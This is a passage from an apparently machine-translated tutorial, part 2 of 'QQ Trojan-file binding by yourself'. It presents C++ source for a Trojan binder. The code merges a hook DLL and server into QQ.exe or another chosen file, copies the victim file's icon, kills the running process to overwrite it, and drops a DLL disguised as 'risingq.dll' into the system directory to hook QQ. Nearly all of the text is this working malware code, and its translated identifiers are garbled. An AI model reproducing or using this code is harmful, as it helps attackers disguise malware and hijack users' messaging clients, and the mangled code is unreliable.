QQ Trojan-file binding by yourself (Part 2)

Next article:

The Code is as follows:
// Determine whether to continue executing the file based on the returned value
Bool CBindFile: Initiate ()
{
Int I = 0, k = 0;
DWORD dwErrorCode = 0;
DWORD dwFileLen = GetFileSize (hFileMyself, NULL );
// Add the final size of the bundle program to determine whether the file is bound or the execution file is decomposed.
If (dwFileLen = lenOrigin)
{
// Bind HOOK. dll
StrToBindFilePath = "hook. dll ";
StrFinalFilePath = "Server.exe ";
Lstrcpy (m_Ext, "dll ");

If (Bind_File ())
{
// Bound successfully
MessageBox (NULL, "bound successfully! ", NULL, NULL );

}
Return false;
}
Else if (dwFileLen = lenOriginAddDll)
{
// Bind the target file
// The local file named "server.exe"
Char szName [7] = {0 };
Int I = lstrlen (my_name)-10;
For (k = 0; k <6; k ++, I ++)
{
SzName [k] = my_name [I];
}
If (0! = Lstrcmp (szName, "SERVER "))
{
// Automatically bind qq.exe to obtain the installation path of QQ through the Registry
StrToBindFilePath = "C: // Program Files // Tencent // QQ.exe ";
Lstrcpy (m_Ext, "exe ");
}
Else
{
// The dialog box appears, waiting for user input
SelectFileToBind dlg;
Int nRet =-1;
NRet = dlg. DoModal ();
If (nRet! = IDOK)
{
MessageBox (NULL, "None input to get bindfilename", NULL, NULL );
Return false;
}
Dlg. GetFilePath (strToBindFilePath );
If (strToBindFilePath. IsEmpty ())
{
MessageBox (NULL, "None input filename", NULL, NULL );
Return false;
}
// Get the file extension and set m_Ext
Int pt = strToBindFilePath. GetLength ()-3;
For (I = 0; I <3; I ++)
{
M_Ext [I] = strToBindFilePath. GetAt (pt );
Pt ++;
}
MessageBox (NULL, m_Ext, "PRINT", NULL );
}
StrFinalFilePath = "000000.exe ";
// First determine whether the target file has been bound
HANDLE hDestFile = NULL;
DWORD bytesin = 0;
HDestFile = CreateFile (strToBindFilePath, GENERIC_READ,
File_cmd_read, NULL, OPEN_EXISTING,
File_attribute_normal, null );
If (invalid_handle_value = hdestfile)
{
MessageBox (null, "failed to open this file when determining the target file! ", Null, null );
Return false;
}
Setfilepointer (hdestfile, getfilesize (hdestfile, null)-4, null, file_begin );
If (0 = readfile (hdestfile, Buf, buf_size, & bytesin, null ))
{
MessageBox (null, "An error occurred while reading the target file! ", Null, null );
Return false;
}
Closehandle (hdestfile );
If (4! = Bytesin)
{
MessageBox (NULL, "determines that the number of bytes read in the target file is not 4! ", NULL, NULL );
Return false;
}
For (I = 0; I <4; I ++)
{
If (buf [I]! = SzFlag [I])
{
Break;
} Else if (3 = I)
{
// If it has been bound, return
MessageBox (NULL, "the target file has been bound! ", NULL, NULL );
Return false;
}
}
// Start binding if you confirm that you have not been bound
Bind_File ();
// If the bound file is not an EXE file, change it to an EXE file.
If (0! = Lstrcmp (m_Ext, "exe "))
{
DeleteFile (strToBindFilePath );
// Modify the file extension
CString strToBindFilePath1;
StrToBindFilePath1 = strToBindFilePath. Left (strToBindFilePath. GetLength ()-3 );
StrToBindFilePath1 + = "exe ";
StrToBindFilePath. Empty ();
StrToBindFilePath = strToBindFilePath1;
}
BOOL bResult;
BResult = CopyFile (strFinalFilePath, strToBindFilePath, false );
DwErrorCode = GetLastError ();
If (32 = dwErrorCode)
{
// Other processes are using this file to end the process
TCHAR szFileName_Exe [MAX_PATH];
StrToBindFilePath. MakeUpper ();
Lstrcpy (szFileName_Exe, (LPCTSTR) strToBindFilePath );
If (TRUE = CloseProcessFromName (szFileName_Exe ))
{
BResult = CopyFile (strFinalFilePath, strToBindFilePath, false );
DwErrorCode = GetLastError ();
CString str;
Str. Format ("% d CopyFiles Error code % d", bResult, dwError );
MessageBox (NULL, str, NULL, NULL );
}
}
DeleteFile (strFinalFilePath );
Return false;
}
Else
{
// Determine whether the target file needs to be hooked
If (IsSpecFileName ("QQ. EXE "))
{
// Break down HOOK. dll and target file
TCHAR szSysPath [MAX_PATH];
: GetSystemDirectory (szSysPath, MAX_PATH );
StrUnbindFilePath_Dll = szSysPath;
StrUnbindFilePath_Dll + = "// risingq. dll ";
MessageBox (NULL, strUnbindFilePath_Dll, "PRINT", NULL );
Unbind_and_Run ();
Return true;
}
Else
{
// If this program is not a target HOOK file, it will be decomposed into an original file SERVER for running.
MessageBox (NULL, "running is not the target file", NULL, NULL );
CloneMySelf_and_Run ();
Return false;
}
}
}
2. Bind_File ()
// Bind the specified file to generate a merged File
Bool CBindFile: Bind_File ()
{
HANDLE hFileOut = NULL; // final file Merging
HANDLE hFileIn = NULL; // file to be bound
DWORD dwFileInLen = 0; // length of the file to be bound
DWORD bytesin = 0; // number of bytes entered at a time
DWORD bytesout = 0; // number of bytes output at a time
Unsigned int I = 0, k = 0;
Byte * bufmyself = NULL;
 
Modify_data.my_length = getfilesize (hfilemyself, null );
If (0 = modify_data.my_length)
{
MessageBox (null, "An error occurred while binding the file itself to zero length! "," Error ", mb_ OK );
Return false;
}
Bufmyself = new byte [modify_data.my_length];
If (null = bufmyself)
{
MessageBox (null, "failed to allocate memory in file binding! ", Null, null );
Return false;
}
ZeroMemory (bufMyself, modify_data.my_length );
SetFilePointer (hFileMyself, 0, NULL, FILE_BEGIN );
// Read the data of this file
If (0 = ReadFile (hFileMyself, bufMyself, modify_data.my_length, & bytesin, NULL ))
{
Delete [] bufMyself;
MessageBox (NULL, "An error occurred while binding the file. The file cannot be completely read! "," Error ", MB_ OK );
Return false;
}
If (0 = lstrcmp (m_Ext, "dll") // locate the file size when you bind the DLL.
{
For (I = 0; I <modify_data.my_length-sizeof (modify_data.finder );
I + = sizeof (modify_data.finder ))
{
For (k = 0; k <sizeof (modify_data.finder); k ++)
{
If (bufMyself [I + k]! = (BYTE *) & modify_data.finder) [k])
Break;
}
If (k = sizeof (modify_data.finder) // locate and save the size of your data file
{
Memcpy (bufMyself + I, & modify_data, sizeof (modify_data ));
Break;
}
}
If (I> = modify_data.my_length-sizeof (modify_data.finder ))
{
Delete [] bufMyself;
MessageBox (null, "An error occurred while binding the file. The file cannot be located! "," Error ", mb_ OK );
Return false;
}
}
// If a PE file is bound, copy the icon of the PE file to the final merged file.
If (0 = lstrcmp (m_ext, "EXE "))
{
Modify_myicon (bufmyself );
}

// Create the final merged File
Hfileout = createfile (strfinalfilepath, generic_write,
File_pai_read, null, open_always,
File_attribute_normal, null );
If (invalid_handle_value = hfileout)
{
Delete [] bufmyself;
MessageBox (NULL, "in the binding file, an error occurred while creating the merged file generated after the binding! "," Error ", MB_ OK );
Return false;
}
// Write the data of this file to the output file
WriteFile (hFileOut, bufMyself, bytesin, & bytesout, NULL );
// Release the large memory that stores the file data, and use buf as the buffer later
Delete [] bufMyself;

// Open the file to be bound
HFileIn = CreateFile (strToBindFilePath, GENERIC_READ,
File_cmd_read, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL );
If (INVALID_HANDLE_VALUE = hFileIn)
{
MessageBox (NULL, "An error occurred while opening the first file to be bound in the bound file! "," Error ", MB_ OK );
Return false;
}
// Obtain the length of the file to be bound
DwFileInLen = GetFileSize (hFileIn, NULL );
If (0 = dwFileInLen)
{
CloseHandle (hFileIn );
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the file to be bound in the bound file! "," Error ", MB_ OK );
Return false;
}
// Write the length of the file to be bound to the merged File
WriteFile (hFileOut, & dwFileInLen, sizeof (dwFileInLen), & bytesout, NULL );
// Write the extension of the final decomposed File
WriteFile (hFileOut, m_Ext, 3, & bytesout, NULL );
// Read data from the file to be bound and write it to the output file
Do
{
If (0 = readfile (hfilein, Buf, buf_size, & bytesin, null ))
{
Closehandle (hfilein );
Closehandle (hfileout );
MessageBox (null, "file binding in progress, read the file to be bound size does not match! ", Null, null );
Return false;
}
Writefile (hfileout, Buf, bytesin, & bytesout, null );
} While (0! = Bytesin );
 
If (0! = Lstrcmp (m_ext, "DLL "))
{
// Mark that the file has been bound when binding a non-DLL file
If (0 = writefile (hfileout, szflag, lstrlen (szflag), & bytesout, null ))
{
MessageBox (null, "An error occurred while writing the bound flag in the bound file.", null, null );
Return false;
}
}
CloseHandle (hFileIn );
CloseHandle (hFileOut );
Return true;
}
Here we will mainly explain the modify_data, which is a global variable in the MODIFY_DATA structure. Its structure is as follows:
Struct MODIFY_DATA {
DWORD finder; // constant (locate itself)
DWORD my_length; // file length (itself)
} Modify_data = {0x78563412, 0 };
Because the global variable is stored in the. data area of the PE file, you only need to open the file search finder and find the location where the variable is stored in the PE file.
Then, the size of my_length is written at this location. Later, when the file is running, modify_data will be initialized to the write size. Of course
Method is risky, and multiple finder data may exist.